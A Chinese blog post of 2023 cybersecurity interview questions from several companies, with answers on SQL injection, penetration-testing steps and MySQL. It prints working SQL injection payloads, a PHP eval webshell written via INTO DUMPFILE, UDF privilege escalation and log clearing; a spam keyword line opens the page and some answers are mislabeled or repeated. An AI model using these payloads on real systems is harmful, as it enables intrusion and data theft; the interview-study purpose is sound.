国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料)

這篇具有很好參考價(jià)值的文章主要介紹了2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

隨著國家政策的扶持,網(wǎng)絡(luò)安全行業(yè)也越來越為大眾所熟知,相應(yīng)的想要進(jìn)入到網(wǎng)絡(luò)安全行業(yè)的人也越來越多,為了更好地進(jìn)行工作,除了學(xué)好網(wǎng)絡(luò)安全知識外,還要應(yīng)對企業(yè)的面試。

所以在這里我歸總了一些網(wǎng)絡(luò)安全方面的常見面試題,希望對大家有所幫助。

內(nèi)容來自于社群內(nèi)畢業(yè)生在畢業(yè)前持續(xù)整理、收集的安全崗面試題及面試經(jīng)驗(yàn)分享~

注:所有的資料都整理成了PDF,面試題和答案將會(huì)持續(xù)更新,因?yàn)闊o論如何也不可能覆蓋所有的面試題。

2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料),web安全,網(wǎng)絡(luò),安全,網(wǎng)絡(luò)安全,學(xué)習(xí)

目錄

一、字節(jié)跳動(dòng)-滲透測試實(shí)習(xí)生

二、深信服-漏洞研究員實(shí)習(xí)

三、字節(jié)跳動(dòng)-安全研究實(shí)習(xí)生

四、長亭科技-安全服務(wù)工程師

五、騰訊-安全技術(shù)實(shí)習(xí)生

六、小鵬汽車-安全工程師

七、大廠高頻面試題匯總

7.1、SQL注入防護(hù)方法

7.2、常見的Web安全漏洞

7.3、給你一個(gè)網(wǎng)站你是如何來滲透測試的?

7.4、滲透測試流程

7.5、SQL注入類型

7.6、SQL注入的原理

7.7、如何進(jìn)行SQL注入的防御

7.8、sqlmap,怎么對一個(gè)注入點(diǎn)注入?

7.9、mysql的網(wǎng)站注入,5.0以上和5.0以下有什么區(qū)別?

7.10、MySQL存儲(chǔ)引擎?

7.11、什么是事務(wù)?

7.12、讀鎖和寫鎖

7.13、MySQL的索引

7.14、ORDER BY在注入的運(yùn)用

7.15、GPC是什么?GPC之后怎么繞過?

7.16、Mysql一個(gè)@和兩個(gè)@什么區(qū)別

7.17、注入/繞過常用的函數(shù)

7.18、盲注和延時(shí)注入的共同點(diǎn)?

7.19、如何拿一個(gè)網(wǎng)站的webshell?

7.20、sql注入寫文件都有哪些函數(shù)?

7.21、各種寫shell的問題

7.22、sql注入寫文件都有哪些函數(shù)?

7.23、sql二次注入

7.24、SQL和NoSQL的區(qū)別


一、字節(jié)跳動(dòng)-滲透測試實(shí)習(xí)生

  • 自我介紹
  • 滲透的流程
  • 信息收集如何處理子域名爆破的泛解析問題
  • 如何繞過CDN查找真實(shí)ip
  • phpinfo你會(huì)關(guān)注哪些信息
  • 有沒有了解過權(quán)限維持
  • 說一個(gè)你感覺不錯(cuò)的漏洞,展開講講
  • 輸出到href的XSS如何防御
  • samesite防御CSRF的原理
  • CSRF防御
  • json格式的CSRF如何防御
  • 瀏覽器解析順序和解碼順序
  • 過濾逗號的SQL注入如何繞過
  • 過濾limit后的逗號如何繞過
  • fastjson相關(guān)漏洞
  • 說一個(gè)你知道的python相關(guān)的漏洞(SSTI原理,利用過程,payload相關(guān)的東西)開放性問答

二、深信服-漏洞研究員實(shí)習(xí)

  • 自我介紹
  • 在xx實(shí)習(xí)的時(shí)候做什么東西
  • 滲透測試的思路簡單說一下
  • 護(hù)網(wǎng)在里面擔(dān)當(dāng)一個(gè)什么樣的角色
  • 紅隊(duì)的一些思路
  • 拿下系統(tǒng)后有沒有做橫向
  • 前段時(shí)間那個(gè)log4j有研究嗎,可以簡單說一下嗎
  • (繼上一個(gè)問題)有哪些混淆繞過的方法
  • 內(nèi)存馬有沒有了解過
  • 冰蝎、哥斯拉這些工具有沒有了解過
  • 做攻擊隊(duì)的時(shí)候有沒有研究過什么攻擊,比如研究一些工具還是魔改什么的
  • 那么多漏洞和攻擊,比較擅長哪一個(gè)
  • 說一下shiro反序列化的形成原因、利用鏈
  • 對一些bypass的方法有沒有了解過,有什么姿勢可以簡單介紹一下
  • 反問

三、字節(jié)跳動(dòng)-安全研究實(shí)習(xí)生

  • 你投的崗位是安全研究實(shí)習(xí)生,你了解我們這邊主要是做什么的嗎
  • 自我介紹
  • 現(xiàn)在有什么比較想做的方向嗎,比如你寫的代碼審計(jì)、攻防演練、你在學(xué)校的研究方向(密碼學(xué))其實(shí)是三個(gè)大方向,現(xiàn)在有什么比較想做的嗎
  • 有沒有審過開源框架、cms、中間件之類的
  • 面試官介紹了工作內(nèi)容
  • 我看你簡歷上有幾段實(shí)習(xí)經(jīng)歷和項(xiàng)目經(jīng)歷,先聊一下實(shí)習(xí)經(jīng)歷吧,在A主要做什么的
  • 詳細(xì)聊聊入侵測試主要在做什么,遇到的問題
  • 關(guān)于入侵檢測產(chǎn)生大量誤報(bào)的原因,有沒有分析過,有沒有比較好的解決方法
  • 和A比起來,B的應(yīng)該就比較偏攻擊方對吧,有打仗(霧,面試官好像確實(shí)是這么說的)有代碼審計(jì),聊一下在B主要做了些什么
  • 審表達(dá)式引擎的步驟和思路
  • 剛剛你說的審計(jì)聽起來好像和普通開發(fā)的審計(jì)差不多,都是通過程序流、文檔去做,有沒有從安全方面入手審計(jì)一些項(xiàng)目
  • xxe是怎么造成的,從代碼層面來看
  • 我看你簡歷有很多攻防演練經(jīng)歷對吧,這幾段攻防演練經(jīng)歷有沒有哪一次印象比較深刻的,挑一個(gè)聊一聊
  • 你的這次攻擊好像更多的是利用弱口令,有沒有一些更有技巧的方法
  • 這個(gè)頭像上傳的webshell是怎么上傳的
  • 還有什么其他的檢驗(yàn)方式?要怎么繞過?
  • 這兩天log4j漏洞很火,有沒有去了解一下
  • 面試官最后介紹業(yè)務(wù)
  • 反問環(huán)節(jié)

四、長亭科技-安全服務(wù)工程師

  • 自我介紹
  • web滲透測試有沒有過實(shí)戰(zhàn)
  • 講一下sql注入原理
  • 有沒有從代碼層面了解過sql注入的成因(反問代碼層面指的是不是sql語句,答是)
  • 了不了解xss,有沒有從代碼層面了解xss的原理
  • 對owasp top10漏洞哪個(gè)比較了解
  • 講一講怎么防御sql注入
  • sql注入怎么繞過過濾
  • 問了護(hù)網(wǎng)時(shí)xx有沒有成為靶標(biāo),有沒有對攻擊隊(duì)行為做過研判
  • 在xx護(hù)網(wǎng)時(shí)的工作內(nèi)容,有沒有做過流量包、數(shù)據(jù)包的研判
  • 學(xué)校攻防演練時(shí)擔(dān)任的角色,主要工作內(nèi)容,滲透測試的思路,有什么成果(這個(gè)問的還是挺細(xì)的,具體到分配的任務(wù)、有沒有拿下主機(jī)或者域控、攻防演練的形式和持續(xù)時(shí)間等都聊了)
  • 平時(shí)ctf打的多不多,有什么成績
  • 平時(shí)會(huì)不會(huì)關(guān)注一些新穎的漏洞,會(huì)不會(huì)做代碼審計(jì),比如shiro漏洞等有沒有做過漏洞復(fù)現(xiàn)
  • 對釣魚郵件這些有沒有什么了解(因?yàn)樯厦媪膞x護(hù)網(wǎng)時(shí)說了釣魚郵件和微信釣魚的事)
  • 目前學(xué)習(xí)的方向是什么
  • 最后介紹人才需求
  • 反問環(huán)節(jié)

五、騰訊-安全技術(shù)實(shí)習(xí)生

  • 自我介紹
  • sql注入了解嗎,講一講二次注入的原理
  • 二次注入要怎么修復(fù)
  • sql注入過waf了解嗎,若一個(gè)sql注入過濾了information關(guān)鍵詞,怎么繞過
  • Redis未授權(quán)訪問
  • 滲透測試的一個(gè)完整流程
  • 打ctf的時(shí)候有沒有遇到什么印象特別深的題目
  • 文件下載漏洞有沒有什么比較好的利用方式
  • 利用文件下載漏洞找文件名具體是找什么文件名(讀取文件一般會(huì)讀取哪些文件)(ctf中?實(shí)戰(zhàn)中?)
  • 命令執(zhí)行漏洞,http不出網(wǎng)有什么比較好的處理方法(發(fā)散一點(diǎn)說)
  • 接上一題,通過隧道通信,詳細(xì)講講通過什么類型的隧道,講講具體操作
  • 漏洞預(yù)警
  • 有沒有復(fù)現(xiàn)過中間件類型的漏洞(有沒有完整的復(fù)現(xiàn)過漏洞)
  • 在學(xué)校的攻防演練中扮演的角色的主要職責(zé)是什么

六、小鵬汽車-安全工程師

  • 自我介紹
  • 有沒有挖過src?
  • 平時(shí)web滲透怎么學(xué)的,有實(shí)戰(zhàn)嗎?有過成功發(fā)現(xiàn)漏洞的經(jīng)歷嗎?
  • 做web滲透時(shí)接觸過哪些工具
  • xxe漏洞是什么?ssrf是什么?
  • 打ctf的時(shí)候負(fù)責(zé)什么方向的題
  • 為什么要搞信息安全,對安全這一塊有多大的興趣,以后會(huì)不會(huì)轉(zhuǎn)行,還是打算一直從事安全方面工作
  • 自己平時(shí)怎么學(xué)安全的,如果讓你做一個(gè)新的方向(app安全),會(huì)投入多少時(shí)間去學(xué)習(xí),還是說有自己想做的方向
  • 聊一聊代碼審計(jì)的流程
  • 平時(shí)是怎么做代碼審計(jì)的
  • 有沒有審計(jì)過開源框架、CMS?
  • 怎么判斷一個(gè)數(shù)據(jù)庫是mysql還是oracle的?
  • sql注入的種類,利用方式?
  • 聊一聊sql注入的原理及防御思路
  • 做開發(fā)的時(shí)候用的是什么語言
  • 做java開發(fā)的時(shí)候用過什么框架,能不能做java安全開發(fā)
  • 有沒有做過安卓開發(fā)
  • 有沒有用python寫過工具?
  • msf利用的是哪個(gè)漏洞,有沒有成功反彈?
  • 護(hù)網(wǎng)的時(shí)候主要做了些什么,聊一聊對安全產(chǎn)品的理解
  • 公司現(xiàn)在需要做app安全的人,現(xiàn)在要你做的話,你會(huì)去學(xué)嗎,或者說感興趣嗎,還是說有別的想做的,不想做app安全,能投入多少時(shí)間去學(xué)
  • 內(nèi)網(wǎng)滲透了解嗎?聊一聊內(nèi)網(wǎng)滲透的思路

七、大廠高頻面試題匯總

這次花了三個(gè)月的時(shí)間整理各大安全廠商的網(wǎng)絡(luò)安全職位(包括但不僅限于:安全服務(wù)工程師,安全運(yùn)營工程師,安全,安全攻防工程師“)的面試問題。

話不多說,讓我們一起學(xué)習(xí)吧

目前來說還有非常多的不嚴(yán)謹(jǐn)和冗余,懇請小伙伴們指正修改!

?2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料),web安全,網(wǎng)絡(luò),安全,網(wǎng)絡(luò)安全,學(xué)習(xí)

7.1、SQL注入防護(hù)方法

  • 失效的身份認(rèn)證和會(huì)話管理
  • 跨站腳本攻擊XSS
  • 直接引用不安全的對象
  • 安全配置錯(cuò)誤
  • 敏感信息泄露
  • 缺少功能級的訪問控制
  • 跨站請求偽造CSRF
  • 使用含有已知漏洞的組件
  • 未驗(yàn)證的重定向和轉(zhuǎn)發(fā)

7.2、常見的Web安全漏洞

  • SQL注入
  • XSS
  • 文件遍歷、文件上傳、文件下載
  • 垂直越權(quán)、水平越權(quán)
  • 邏輯漏洞
  • 首先對于新人來說,大多數(shù)同學(xué)都是沒有實(shí)戰(zhàn)經(jīng)驗(yàn)的,對應(yīng)面試官提問聊聊你的滲透測試實(shí)戰(zhàn),但很多人卻無從開口。

7.3、給你一個(gè)網(wǎng)站你是如何來滲透測試的?

在獲取書面授權(quán)的前提下。

1)信息收集

獲取域名的whois信息,獲取注冊者郵箱姓名電話等。

查詢服務(wù)器旁站以及子域名站點(diǎn),因?yàn)橹髡疽话惚容^難,所以先看看旁站有沒有通用性的cms或者其他漏洞。

查看服務(wù)器操作系統(tǒng)版本,web中間件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞

查看IP,進(jìn)行IP地址端口掃描,對響應(yīng)的端口進(jìn)行漏洞探測,比如 rsync,心臟出血,mysql,ftp,ssh弱口令等

掃描網(wǎng)站目錄結(jié)構(gòu),看看是否可以遍歷目錄,或者敏感文件泄漏,比如php探針

google hack 進(jìn)一步探測網(wǎng)站的信息,后臺,敏感文件

2)漏洞掃描

開始檢測漏洞,如XSS,XSRF,sql注入,代碼執(zhí)行,命令執(zhí)行,越權(quán)訪問,目錄讀取,任意文件讀取,下載,文件包含,

遠(yuǎn)程命令執(zhí)行,弱口令,上傳,編輯器漏洞,暴力破解等

3)漏洞利用

利用以上的方式拿到webshell,或者其他權(quán)限

4)權(quán)限提升

提權(quán)服務(wù)器,比如windows下mysql的udf提權(quán),serv-u提權(quán),windows低版本的漏洞,如iis6,pr,巴西烤肉,

linux藏牛漏洞,linux內(nèi)核版本漏洞提權(quán),linux下的mysql system提權(quán)以及oracle低權(quán)限提權(quán)

5) 日志清理

6)總結(jié)報(bào)告及修復(fù)方案

7.4、滲透測試流程

  • 項(xiàng)目訪談
  • 信息收集:whois、網(wǎng)站源IP、旁站、C段網(wǎng)站、服務(wù)器系統(tǒng)版本、容器版本、程序版本、數(shù)據(jù)庫類型、二級域名、防火墻、維護(hù)者信息
  • 漏洞掃描:Nessus, AWVS
  • 手動(dòng)挖掘:邏輯漏洞
  • 驗(yàn)證漏洞
  • 修復(fù)建議
  • (如果有)基線檢查/復(fù)驗(yàn)漏洞
  • 輸出報(bào)告
  • 概述
  • 測試基本信息
  • 測試范圍
  • 測試時(shí)間
  • 測試任務(wù)
  • 測試過程
  • 信息安全風(fēng)險(xiǎn)綜合分析
  • 整體風(fēng)險(xiǎn)分析
  • 風(fēng)險(xiǎn)影響分析
  • 系統(tǒng)安全分析
  • 安全漏洞列表
  • 解決方案建議
  • 復(fù)測報(bào)告
  • SQL面試題

2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料),web安全,網(wǎng)絡(luò),安全,網(wǎng)絡(luò)安全,學(xué)習(xí)

7.5、SQL注入類型

  • 基于報(bào)錯(cuò)注入
  • 基于布爾的注入,根據(jù)返回頁面判斷條件真假的注入
  • 基于時(shí)間的盲注,不能根據(jù)頁面返回內(nèi)容判斷任何信息,用條件語句查看時(shí)間延遲語句是否執(zhí)行(即頁面返回時(shí)間是否增加)來判斷。
  • 寬字節(jié)注入
  • 聯(lián)合查詢,可以使用 union 的情況下的注入。
  • 堆查詢注入,可以同時(shí)執(zhí)行多條語句的執(zhí)行時(shí)的注入。

7.6、SQL注入的原理

通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。通常未經(jīng)檢查或者未經(jīng)充分檢查的用戶輸入數(shù)據(jù)或代碼編寫問題,意外變成了代碼被執(zhí)行。

7.7、如何進(jìn)行SQL注入的防御

  • 關(guān)閉應(yīng)用的錯(cuò)誤提示
  • 加waf
  • 對輸入進(jìn)行過濾
  • 限制輸入長度
  • 限制好數(shù)據(jù)庫權(quán)限,drop/create/truncate等權(quán)限謹(jǐn)慎grant
  • 預(yù)編譯好sql語句,python和Php中一般使用?作為占位符。這種方法是從編程框架方面解決利用占位符參數(shù)的sql注入,只能說一定程度上防止注入。還有緩存溢出、終止字符等。
  • 數(shù)據(jù)庫信息加密安全(引導(dǎo)到密碼學(xué)方面)。不采用md5因?yàn)橛胁屎绫?,一般是一次md5后加鹽再md5
  • 清晰的編程規(guī)范,結(jié)對/自動(dòng)化代碼 review ,加大量現(xiàn)成的解決方案(PreparedStatement,ActiveRecord,歧義字符過濾, 只可訪問存儲(chǔ)過程 balabala)已經(jīng)讓 SQL 注入的風(fēng)險(xiǎn)變得非常低了。
  • 具體的語言如何進(jìn)行防注入,采用什么安全框架

7.8、sqlmap,怎么對一個(gè)注入點(diǎn)注入?

  • 如果是get型號,直接,sqlmap -u “諸如點(diǎn)網(wǎng)址”.
  • 如果是post型諸如點(diǎn),可以sqlmap -u "注入點(diǎn)網(wǎng)址” --data=“post的參數(shù)”
  • 如果是cookie,X-Forwarded-For等,可以訪問的時(shí)候,用burpsuite抓包,注入處用*號替換,放到文件里,然后sqlmap -r “文件地址”

7.9、mysql的網(wǎng)站注入,5.0以上和5.0以下有什么區(qū)別?

10年前就出了5.0,現(xiàn)在都到5.7了,沒啥意義的問題

5.0以下沒有information_schema這個(gè)系統(tǒng)表,無法列表名等,只能暴力跑表名。

5.0以下是多用戶單操作,5.0以上是多用戶多操做。

7.10、MySQL存儲(chǔ)引擎?

1、InnoDB:主流的存儲(chǔ)引擎。支持事務(wù)、支持行鎖、支持非鎖定讀、支持外鍵約束

為MySQL提供了具有提交、回滾和崩潰恢復(fù)能力的事物安全(ACID兼容)存儲(chǔ)引擎。InnoDB鎖定在行級并且也在 SELECT語句中提供一個(gè)類似Oracle的非鎖定讀。這些功能增加了多用戶部署和性能。在SQL查詢中,可以自由地將InnoDB類型的表和其他MySQL的表類型混合起來,甚至在同一個(gè)查詢中也可以混合

InnoDB存儲(chǔ)引擎為在主內(nèi)存中緩存數(shù)據(jù)和索引而維持它自己的緩沖池。InnoDB將它的表和索引在一個(gè)邏輯表空間中,表空間可以包含數(shù)個(gè)文件(或原始磁盤文件)。這與MyISAM表不同,比如在MyISAM表中每個(gè)表被存放在分離的文件中。InnoDB表可以是任何尺寸,即使在文 件尺寸被限制為2GB的操作系統(tǒng)上

InnoDB支持外鍵完整性約束,存儲(chǔ)表中的數(shù)據(jù)時(shí),每張表的存儲(chǔ)都按主鍵順序存放,如果沒有顯示在表定義時(shí)指定主鍵,InnoDB會(huì)為每一行生成一個(gè)6字節(jié)的ROWID,并以此作為主鍵

2、MyISAM:訪問速度快,不支持事務(wù),逐漸被淘汰

3、MEMORY:BTREE索引或者HASH索引。將表中數(shù)據(jù)放在內(nèi)存中,并發(fā)性能差。

4、MERGE、Archive等等不常用的

2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料),web安全,網(wǎng)絡(luò),安全,網(wǎng)絡(luò)安全,學(xué)習(xí)

7.11、什么是事務(wù)?

事務(wù)是一組原子性的SQL語句或者說是一個(gè)獨(dú)立的工作單元,如果數(shù)據(jù)庫引擎能夠成功對數(shù)據(jù)庫應(yīng)用這組SQL語句,那么就執(zhí)行,如果其中有任何一條語句因?yàn)楸罎⒒蚱渌驘o法執(zhí)行,那么所有的語句都不會(huì)執(zhí)行。也就是說,事務(wù)內(nèi)的語句,要么全部執(zhí)行成功,要么全部執(zhí)行失敗。

舉個(gè)銀行應(yīng)用的典型例子:

假設(shè)銀行的數(shù)據(jù)庫有兩張表:支票表和儲(chǔ)蓄表,現(xiàn)在某個(gè)客戶A要從其支票賬戶轉(zhuǎn)移2000元到其儲(chǔ)蓄賬戶,那么至少需求三個(gè)步驟:

a.檢查A的支票賬戶余額高于2000元;

b.從A的支票賬戶余額中減去2000元;

c.在A的儲(chǔ)蓄賬戶余額中增加2000元。

這三個(gè)步驟必須要打包在一個(gè)事務(wù)中,任何一個(gè)步驟失敗,則必須要回滾所有的步驟,否則A作為銀行的客戶就可能要莫名損失2000元,就出問題了。這就是一個(gè)典型的事務(wù),這個(gè)事務(wù)是不可分割的最小工作單元,整個(gè)事務(wù)中的所有操作要么全部提交成功,要么全部失敗回滾,不可能只執(zhí)行其中一部分,這也是事務(wù)的原子性特征。

7.12、讀鎖和寫鎖

讀鎖是共享的,即相互不阻塞的,多個(gè)客戶在同一時(shí)刻可以讀取同一資源,互不干擾。寫鎖是排他的,即一個(gè)寫鎖會(huì)阻塞其它的寫鎖和讀鎖,只有這樣,才能確保給定時(shí)間內(nèi),只有一個(gè)用戶能執(zhí)行寫入,防止其它用戶讀取正在寫入的同一資源。寫鎖優(yōu)先級高于讀鎖。

7.13、MySQL的索引

索引是幫助MySQL高效獲取數(shù)據(jù)的數(shù)據(jù)結(jié)構(gòu)。MYISAM和InnoDB存儲(chǔ)引擎只支持BTree索引;MEMORY和HEAP儲(chǔ)存引擎可以支持HASH和BTREE索引。

7.14、ORDER BY在注入的運(yùn)用

order by后面可以加字段名,表達(dá)式和字段的位置,字段的位置需要是整數(shù)型。

7.15、GPC是什么?GPC之后怎么繞過?

如果magic_quotes_gpc=On,PHP解析器就會(huì)自動(dòng)為post、get、cookie過來的數(shù)據(jù)增加轉(zhuǎn)義字符“\”,以確保這些數(shù)據(jù)不會(huì)引起程序,特別是數(shù)據(jù)庫語句因?yàn)樘厥庾址ㄕJ(rèn)為是php的字符)引起的污染。

7.16、Mysql一個(gè)@和兩個(gè)@什么區(qū)別

@為用戶變量,使用SET @var1=1賦值

@@ 為系統(tǒng)變量 ,包括全局變量show global variables \G;和會(huì)話變量show session variables \G;

2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料),web安全,網(wǎng)絡(luò),安全,網(wǎng)絡(luò)安全,學(xué)習(xí)

7.17、注入/繞過常用的函數(shù)

1、基于布爾SQL盲注

left(database(),1)>'s'

ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+

ascii(substr((select database()),1,1))=98

ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23

regexp正則注入 select user() regexp '^[a-z]';

select user() like 'ro%'

2、基于報(bào)錯(cuò)的SQL盲注

1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】

2)通過floor報(bào)錯(cuò) 向下取整

3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10).exp()select * from test where id=1 and exp(~(select * from(select user())a));

3、延時(shí)注入如何來判斷?

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

7.18、盲注和延時(shí)注入的共同點(diǎn)?

都是一個(gè)字符一個(gè)字符的判斷

7.19、如何拿一個(gè)網(wǎng)站的webshell?

上傳,后臺編輯模板,sql注入寫文件,命令執(zhí)行,代碼執(zhí)行,

一些已經(jīng)爆出的cms漏洞,比如dedecms后臺可以直接建立腳本文件,wordpress上傳插件包含腳本文件zip壓縮包等

7.20、sql注入寫文件都有哪些函數(shù)?

select ‘一句話’ into outfile ‘路徑’

select ‘一句話’ into dumpfile ‘路徑’

select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

7.21、各種寫shell的問題

1、寫shell用什么函數(shù)?

select '<?php phpinfo()> into outfile 'D:/shelltest.php'

dumpfile

file_put_contents

2、outfile不能用了怎么辦?

select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';可以UDF提權(quán)

3、dumpfile和outfile有什么不一樣?outfile適合導(dǎo)庫,在行末尾會(huì)寫入新行并轉(zhuǎn)義,因此不能寫入二進(jìn)制可執(zhí)行文件。

4、sleep()能不能寫shell?

5、寫shell的條件?

用戶權(quán)限

目錄讀寫權(quán)限

防止命令執(zhí)行:disable_functions,禁止了disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,但是可以用dl擴(kuò)展執(zhí)行命令或者ImageMagick漏洞

open_basedir: 將用戶可操作的文件限制在某目錄下

7.22、sql注入寫文件都有哪些函數(shù)?

select ‘一句話’ into outfile ‘路徑’

select ‘一句話’ into dumpfile ‘路徑’

select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

7.23、sql二次注入

第一次進(jìn)行數(shù)據(jù)庫插入數(shù)據(jù)的時(shí)候,僅僅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 對其中的特殊字符進(jìn)行了轉(zhuǎn)義,在寫入數(shù)據(jù)庫的時(shí)候還是保留了原來的數(shù)據(jù),但是數(shù)據(jù)本身還是臟數(shù)據(jù)。

在將數(shù)據(jù)存入到了數(shù)據(jù)庫中之后,開發(fā)者就認(rèn)為數(shù)據(jù)是可信的。在下一次進(jìn)行需要進(jìn)行查詢的時(shí)候,直接從數(shù)據(jù)庫中取出了臟數(shù)據(jù),沒有進(jìn)行進(jìn)一步的檢驗(yàn)和處理,這樣就會(huì)造成SQL的二次注入。

交友網(wǎng)站,填寫年齡處是一個(gè)注入點(diǎn),頁面會(huì)顯示出與你相同年齡的用戶有幾個(gè)。使用and 1=1確定注入點(diǎn),用order by探測列數(shù),union select探測輸出點(diǎn)是第幾列,

暴庫 group_concat(schema_name) from information_schema.schemata

暴表 group_concat(table_name) from information_schema.schemata where table_schema='hhh'

獲取數(shù)據(jù) concat(flag) from flag

修復(fù):在從數(shù)據(jù)庫或文件中取數(shù)據(jù)的時(shí)候,也要進(jìn)行轉(zhuǎn)義或者過濾。

7.24、SQL和NoSQL的區(qū)別

SQL關(guān)系型數(shù)據(jù)庫,NoSQL(Not only SQL)非關(guān)系型數(shù)據(jù)庫

1.SQL優(yōu)點(diǎn)

關(guān)系型數(shù)據(jù)庫是指用關(guān)系數(shù)學(xué)模型來表示的數(shù)據(jù),其中是以二維表的形式描述數(shù)據(jù)。

結(jié)構(gòu)穩(wěn)定,不易修改,常用聯(lián)表查詢

查詢能力高,可以操作很復(fù)雜的查詢

一致性高,處理數(shù)據(jù)會(huì)使用封鎖保證數(shù)據(jù)不被改變

表具有邏輯性,易于理解

2.SQL缺點(diǎn)

不適用高并發(fā)讀寫

不適用海量數(shù)據(jù)高效讀寫

層次多,擴(kuò)展性低

維護(hù)一致性開銷大

涉及聯(lián)表查詢,復(fù)雜,慢

3.NoSQL優(yōu)點(diǎn)

采用鍵值對存儲(chǔ)數(shù)據(jù)

由于數(shù)據(jù)之間沒有關(guān)系,所以易擴(kuò)展,也易于查詢

數(shù)據(jù)結(jié)構(gòu)靈活,每個(gè)數(shù)據(jù)都可以有不同的結(jié)構(gòu)

由于降低了一致性的要求,所以查詢速度更快

4.比較

非關(guān)系型數(shù)據(jù)庫的產(chǎn)生是因?yàn)殡S著網(wǎng)站的進(jìn)化,并發(fā)性增加,擴(kuò)展性高,一致性要求降低。這樣關(guān)系型數(shù)據(jù)庫最重要的一致性維護(hù)就顯得有點(diǎn)多余,并且消耗著性能。因此有了非關(guān)系型數(shù)據(jù)庫,它可以算是關(guān)系型數(shù)據(jù)庫的一種弱化的結(jié)果,在海量數(shù)據(jù)存儲(chǔ)和查詢上更勝一籌。

兩種數(shù)據(jù)庫沒有好壞之分,只是使用的環(huán)境不一樣。關(guān)系型數(shù)據(jù)庫可以說是更嚴(yán)謹(jǐn)?shù)?,可靠性更?qiáng)的數(shù)據(jù)庫,在對于數(shù)據(jù)精度要求高的環(huán)境,比如說銀行系統(tǒng)這樣自然是像mysql這樣的數(shù)據(jù)庫適合。非關(guān)系型數(shù)據(jù)庫勝在處理大數(shù)據(jù)的速度,但是對于數(shù)據(jù)的準(zhǔn)確度沒有那么高,對于操作量大的環(huán)境比如當(dāng)前大部分web2.0的網(wǎng)站更加適用一些。

由于文章字?jǐn)?shù)限制,剩下的面試題都已整理好pdf文檔以圖片的形式展示

2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料),web安全,網(wǎng)絡(luò),安全,網(wǎng)絡(luò)安全,學(xué)習(xí)

需要剩下完整面試題的伙伴可以在評論區(qū)發(fā)送【求分享】,我挨個(gè)發(fā),或者關(guān)注后自動(dòng)發(fā)送哦文章來源地址http://www.zghlxwxcb.cn/news/detail-597023.html

到了這里,關(guān)于2023網(wǎng)絡(luò)安全面試題匯總(附答題解析+配套資料)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 史上最全網(wǎng)絡(luò)安全面試題匯總

    史上最全網(wǎng)絡(luò)安全面試題匯總

    最近有不少小伙伴跑來咨詢: 想找網(wǎng)絡(luò)安全工作,應(yīng)該要怎么進(jìn)行技術(shù)面試準(zhǔn)備? 工作不到 2 年,想跳槽看下機(jī)會(huì),有沒有相關(guān)的面試題呢? 為了更好地幫助大家高薪就業(yè),今天就給大家分享一份網(wǎng)絡(luò)安全工程師面試題,希望它們能夠幫助大家在面試中,少走一些彎路、更

    2024年02月07日
    瀏覽(25)
  • 2023秋招,網(wǎng)絡(luò)安全面試題

    2023秋招,網(wǎng)絡(luò)安全面試題

    ?Hello,各位小伙伴,我作為一名網(wǎng)絡(luò)安全工程師曾經(jīng)在秋招中斬獲??+個(gè)offer??,并在國內(nèi)知名互聯(lián)網(wǎng)公司任職過的職場老油條,希望可以將我的面試的網(wǎng)絡(luò)安全大廠面試題和好運(yùn)分享給大家~ 轉(zhuǎn)眼2023年秋招已經(jīng)到了金銀??的關(guān)鍵階段,寶子們簡歷抓緊準(zhǔn)備投遞起來呀,沖沖

    2024年02月15日
    瀏覽(30)
  • 2023網(wǎng)絡(luò)安全面試題(附答案)+面經(jīng)

    2023網(wǎng)絡(luò)安全面試題(附答案)+面經(jīng)

